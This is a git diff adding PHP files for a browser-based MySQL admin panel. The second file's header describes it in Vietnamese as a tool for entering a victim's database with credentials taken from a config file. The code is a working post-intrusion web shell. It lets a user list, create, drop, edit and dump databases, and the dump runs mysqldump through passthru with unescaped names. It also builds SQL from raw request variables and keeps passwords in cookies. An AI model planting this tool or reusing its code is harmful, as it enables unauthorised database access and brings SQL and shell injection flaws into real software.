+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Field'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Field'>\n";
+echo "<input type=button value=Cancel onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+  $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+if( $cmd == "add" )
+  $queryStr = "ALTER TABLE $tablename ADD $name ";
+else if( $cmd == "edit" )
+  $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+if( $M != "" )
+  if( $D != "" )
+  $queryStr .= "$type($M,$D) ";
+  else
+  $queryStr .= "$type($M) ";
+else if( $valuelist != "" ) {
+  $valuelist = stripslashes( $valuelist );
+  $queryStr .= "$type($valuelist) ";
+} else
+  $queryStr .= "$type ";
+
+$queryStr .= "$unsigned $zerofill $binary ";
+
+if( $default_value != "" )
+  $queryStr .= "DEFAULT '$default_value' ";
+
+$queryStr .= "$not_null $auto_increment";
+
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+// key change
+$keyChange = false;
+$result = mysql_query( "SHOW KEYS FROM $tablename" );
+$primary = "";
+while( $row = mysql_fetch_array($result) )
+  if( $row["Key_name"] == "PRIMARY" ) {
+  if( $row[Column_name] == $name )
+    $keyChange = true;
+  else
+    $primary .= ", $row[Column_name]";
+  }
+if( $primary_key == "PRIMARY KEY" ) {
+  $primary .= ", $name";
+  $keyChange = !$keyChange;
+}
+$primary = substr( $primary, 2 );
+if( $keyChange == true ) {
+  $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+  $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+}
+
+viewSchema();
+}
+
+function dropField() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewSchema();
+}
+
+function viewData( $queryStr ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+echo "<h1>Data in Table</h1>\n";
+if( $tablename != "" )
+  echo "<p class=location>$dbname &gt; $tablename</p>\n";
+else
+  echo "<p class=location>$dbname</p>\n";
+
+$queryStr = stripslashes( $queryStr );
+if( $queryStr == "" ) {
+  $queryStr = "SELECT * FROM $tablename";
+  if( $orderby != "" )
+  $queryStr .= " ORDER BY $orderby";
+  echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+}
+
+$pResult = mysql_db_query( $dbname, $queryStr );
+$errMsg = mysql_error();
+
+$GLOBALS[queryStr] = $queryStr;
+
+if( $pResult == false ) {
+  echoQueryResult();
+  return;
+}
+if( $pResult == 1 ) {
+  $errMsg = "Success";
+  echoQueryResult();
+  return;
+}
+
+echo "<hr>\n";
+
+$row = mysql_num_rows( $pResult );
+$col = mysql_num_fields( $pResult );
+
+if( $row == 0 ) {
+  echo "No Data Exist!";
+  return;
+}
+
+if( $rowperpage == "" ) $rowperpage = 20;
+if( $page == "" ) $page = 0;
+else $page--;
+mysql_data_seek( $pResult, $page * $rowperpage );
+
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+  echo "</th>\n";
+}
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $rowperpage; $i++ ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  $key = "";
+  for( $j = 0; $j < $col; $j++ ) {
+  $data = $rowArray[$j];
+
+  $field = mysql_fetch_field( $pResult, $j );
+  if( $field->primary_key == 1 )
+    $key .= "&" . $field->name . "=" . $data;
+
+  if( strlen( $data ) > 20 )
+    $data = substr( $data, 0, 20 ) . "...";
+  $data = htmlspecialchars( $data );
+  echo "<td>\n";
+  echo "$data\n";
+  echo "</td>\n";
+  }
+
+  if( $key == "" )
+  echo "<td colspan=2>no Key</td>\n";
+  else {
+  echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+  }
+  echo "</tr>\n";
+}
+echo "</table>\n";
+
+echo "<font size=2>\n";
+echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+echo "<font color=green>\n";
+echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+echo "</font>\n";
+echo " | ";
+if( $page > 0 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Prev</a>\n";
+} else
+  echo "Prev";
+echo " | ";
+if( $page < ($row/$rowperpage)-1 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Next</a>\n";
+} else
+  echo "Next";
+echo " | ";
+if( $row > $rowperpage ) {
+  echo "<input type=text size=4 name=page>\n";
+  echo "<input type=submit value='Go'>\n";
+}
+echo "</form>\n";
+echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Data</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Data</h1>\n";
+  $pResult = mysql_list_fields( $dbname, $tablename );
+  $num = mysql_num_fields( $pResult );
+
+  $key = "";
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+    if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+    else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+  }
+  $key = substr( $key, 0, strlen($key)-4 );
+
+  mysql_select_db( $dbname, $mysqlHandle );
+  $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+  $data = mysql_fetch_array( $pResult );
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echo "<form action='$PHP_SELF' method=post>\n";
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addData_submit>\n";
+else if( $cmd == "edit" )
+  echo "<input type=hidden name=action value=editData_submit>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+echo "<th>Name</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Function</th>\n";
+echo "<th>Data</th>\n";
+echo "</tr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  $fieldname = $field["Field"];
+  $fieldtype = $field["Type"];
+  $len = mysql_field_len( $pResultLen, $i );
+
+  echo "<tr>";
+  echo "<td>$fieldname</td>";
+  echo "<td>".$field["Type"]."</td>";
+  echo "<td>\n";
+  echo "<select name=${fieldname}_function>\n";
+  echo "<option>\n";
+  echo "<option>ASCII\n";
+  echo "<option>CHAR\n";
+  echo "<option>SOUNDEX\n";
+  echo "<option>CURDATE\n";
+  echo "<option>CURTIME\n";
+  echo "<option>FROM_DAYS\n";
+  echo "<option>FROM_UNIXTIME\n";
+  echo "<option>NOW\n";
+  echo "<option>PASSWORD\n";
+  echo "<option>PERIOD_ADD\n";
+  echo "<option>PERIOD_DIFF\n";
+  echo "<option>TO_DAYS\n";
+  echo "<option>USER\n";
+  echo "<option>WEEKDAY\n";
+  echo "<option>RAND\n";
+  echo "</select>\n";
+  echo "</td>\n";
+  $value = htmlspecialchars($data[$i]);
+  if( $cmd == "add" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+  }
+  } else if( $cmd == "edit" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    if( $value == $str )
+      echo "<option selected>$str\n";
+    else
+      echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+  }
+  }
+  echo "</tr>";
+}
+echo "</table><p>\n";
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Data'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Data'>\n";
+echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+mysql_select_db( $dbname, $mysqlHandle );
+if( $cmd == "add" )
+  $queryStr = "INSERT INTO $tablename VALUES (";
+else if( $cmd == "edit" )
+  $queryStr = "REPLACE INTO $tablename VALUES (";
+for( $i = 0; $i < $num-1; $i++ ) {
+  $field = mysql_fetch_field( $pResult );
+  $func = $GLOBALS[$field->name."_function"];
+  if( $func != "" )
+  $queryStr .= " $func(";
+  if( $field->numeric == 1 ) {
+  $queryStr .= $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "),";
+  else
+    $queryStr .= ",";
+  } else {
+  $queryStr .= "'" . $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "'),";
+  else
+    $queryStr .= "',";
+  }
+}
+$field = mysql_fetch_field( $pResult );
+if( $field->numeric == 1 )
+  $queryStr .= $GLOBALS[$field->name] . ")";
+else
+  $queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function deleteData() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+$key = "";
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+  if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+  else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+}
+$key = substr( $key, 0, strlen($key)-4 );
+
+mysql_select_db( $dbname, $mysqlHandle );
+$queryStr =  "DELETE FROM $tablename WHERE $key";
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function dump() {
+global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+if( $action == "dumpTable" )
+  $filename = $tablename;
+else
+  $filename = $dbname;
+
+header("Content-disposition: filename=$filename.sql");
+header("Content-type: application/octetstream");
+header("Pragma: no-cache");
+header("Expires: 0");
+
+$pResult = mysql_query( "show variables" );
+while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  if( $rowArray[0] == "basedir" )
+  $bindir = $rowArray[1]."bin/";
+}
+
+passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+global $PHP_SELF, $command;
+echo "<h1>Utilities</h1>\n";
+if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+  echo "<hr>\n";
+  echo "Show\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+  echo "</ul>\n";
+  echo "Flush\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+  if( $command == "flush_hosts" ) {
+  if( mysql_query( "Flush hosts" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+  if( $command == "flush_logs" ) {
+  if( mysql_query( "Flush logs" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+  if( $command == "flush_privileges" ) {
+  if( mysql_query( "Flush privileges" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+  if( $command == "flush_tables" ) {
+  if( mysql_query( "Flush tables" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+  if( $command == "flush_status" ) {
+  if( mysql_query( "Flush status" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "</ul>\n";
+} else {
+  $queryStr = ereg_replace( "_", " ", $command );
+  $pResult = mysql_query( $queryStr );
+  if( $pResult == false ) {
+  echo "Fail";
+  return;
+  }
+  $col = mysql_num_fields( $pResult );
+
+  echo "<p class=location>$queryStr</p>\n";
+  echo "<hr>\n";
+
+  echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+  echo "<tr>\n";
+  for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>".$field->name."</th>\n";
+  }
+  echo "</tr>\n";
+
+  while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  for( $j = 0; $j < $col; $j++ )
+    echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+  echo "</tr>\n";
+  }
+  echo "</table>\n";
+}
+}
+
+function header_html() {
+global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+color: #FF6000;
+font-size: small;
+}
+h1 {
+color: #0090FF;
+}
+th {
+background-color: #34A725;
+color: #FFFFFF;
+font-size: x-small;
+}
+td {
+background-color: #5DB1FF;
+font-size: x-small;
+}
+form {
+margin-top: 0;
+margin-bottom: 0;
+}
+a {
+text-decoration:none;
+color: #848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none             
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+  echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+  echo "<html>\n";
+  echo "<head>\n";
+  echo "<title>MySQL Web Interface</title>\n";
+  echo "</head>\n";
+  echo "<body>\n";
+  echo "<table width=100% height=100%><tr><td><center>\n";
+  echo "<h1>Wrong Password!</h1>\n";
+  echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+  echo "</center></td></tr></table>\n";
+  echo "</body>\n";
+  echo "</html>\n";
+} else {
+  header_html();
+  if( $action == "listDBs" )
+  listDatabases();
+  else if( $action == "createDB" )
+  createDatabase();
+  else if( $action == "dropDB" )
+  dropDatabase();
+  else if( $action == "listTables" )
+  listTables();
+  else if( $action == "createTable" )
+  createTable();
+  else if( $action == "dropTable" )
+  dropTable();
+  else if( $action == "viewSchema" )
+  viewSchema();
+  else if( $action == "query" )
+  viewData( $queryStr );
+  else if( $action == "addField" )
+  manageField( "add" );
+  else if( $action == "addField_submit" )
+  manageField_submit( "add" );
+  else if( $action == "editField" )
+  manageField( "edit" );
+  else if( $action == "editField_submit" )
+  manageField_submit( "edit" );
+  else if( $action == "dropField" )
+  dropField();
+  else if( $action == "viewData" )
+  viewData( "" );
+  else if( $action == "addData" )
+  manageData( "add" );
+  else if( $action == "addData_submit" )
+  manageData_submit( "add" );
+  else if( $action == "editData" )
+  manageData( "edit" );
+  else if( $action == "editData_submit" )
+  manageData_submit( "edit" );
+  else if( $action == "deleteData" )
+  deleteData();
+  else if( $action == "utils" )
+  utils();
+
+  mysql_close( $mysqlHandle);
+  footer_html();
+}
+}
+
+?>
\ No newline at end of file
diff --git a/php/Mysql_interface_v1.0.php b/php/Mysql_interface_v1.0.php
new file mode 100644
index 0000000..5837f37
--- /dev/null
+++ b/php/Mysql_interface_v1.0.php
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+  echo "<table cellpadding=5>\n";
+  echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+  echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+  echo "</table><p>\n";
+}
+}
+
+function listDatabases() {
+global $mysqlHandle, $PHP_SELF;
+
+echo "<h1>Database List</h1>\n";
+
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createDB>\n";
+echo "<input type=text name=dbname>\n";
+echo "<input type=submit value='Create Database'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+$pDB = mysql_list_dbs( $mysqlHandle );
+$num = mysql_num_rows( $pDB );
+for( $i = 0; $i < $num; $i++ ) {
+  $dbname = mysql_dbname( $pDB, $i );
+  echo "<tr>\n";
+  echo "<td>$dbname</td>\n";
+  echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
